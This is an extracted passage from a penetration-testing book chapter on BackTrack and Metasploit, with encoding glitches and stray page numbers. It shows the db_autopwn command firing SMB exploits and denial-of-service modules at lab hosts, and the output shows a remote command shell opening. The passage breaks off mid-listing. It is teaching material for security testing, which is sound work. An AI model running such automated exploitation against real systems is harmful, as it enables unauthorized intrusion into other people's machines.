And, of course, you can use ??“e to launch the exploits.
msf > db_autopwn -t -p -e
[*] Analysis completed in 4.57713603973389 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against
192.168.1.115:445...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against
192.168.1.230:445...
Chapter 5: Using the BackTrack LiveCD Linux Distribution
117
PART II
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against
192.168.1.115:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.230:445...
[*] Launching exploit/windows/smb/ms06_040_netapi (4/42) against
192.168.1.230:445...
[??¦]
Metasploit found 14 exploits to run against each of 42 machines. It??™s hard to know
which exploit worked and which of the 41 others did not, but on our test network of two
XP SP1 and one Windows 2000 machines, we see the following fly by:
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.1.113:37841 ->
192.168.1.115:18922)
After everything finishes scrolling by, let??™s check to see if we really did get system-level
access to a machine that easily.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.
Pages:
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271